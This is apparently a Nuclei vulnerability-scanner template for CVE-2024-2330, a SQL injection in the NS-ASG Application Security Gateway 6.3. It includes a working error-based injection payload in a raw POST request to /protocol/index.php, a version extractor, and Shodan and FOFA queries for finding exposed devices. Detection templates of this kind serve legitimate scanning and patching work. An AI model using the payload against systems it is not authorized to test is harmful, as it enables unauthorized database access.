id: CVE-2024-2330

info:
  name: NS-ASG Application Security Gateway 6.3 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  impact: |
    Authenticated attackers can extract sensitive database information via SQL injection in the NS-ASG Application Security Gateway.
  remediation: |
    Update NS-ASG Application Security Gateway to a version newer than 6.3.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2330
    - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md
    - https://vuldb.com/?ctiid.256281
    - https://vuldb.com/?id.256281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-2330
    cwe-id: CWE-89
    epss-score: 0.17761
    epss-percentile: 0.9678
  metadata:
    max-request: 2
    shodan-query: http.title:"NS-ASG"
    fofa-query: app="网康科技-NS-ASG安全网关"
  tags: cve,cve2024,ns-asg,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /protocol/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '([~0-9.]+)'"
# digest: 4a0a004730450220664e93f35194caf238ddacb7d1a478c44ebb0578e0e0377cd50d2652df643d19022100a101557de270f0acfe322471453b9bd959aff5b0057d42b6a7b654611b772aba:922c64590222798bb761d5b6d8e72950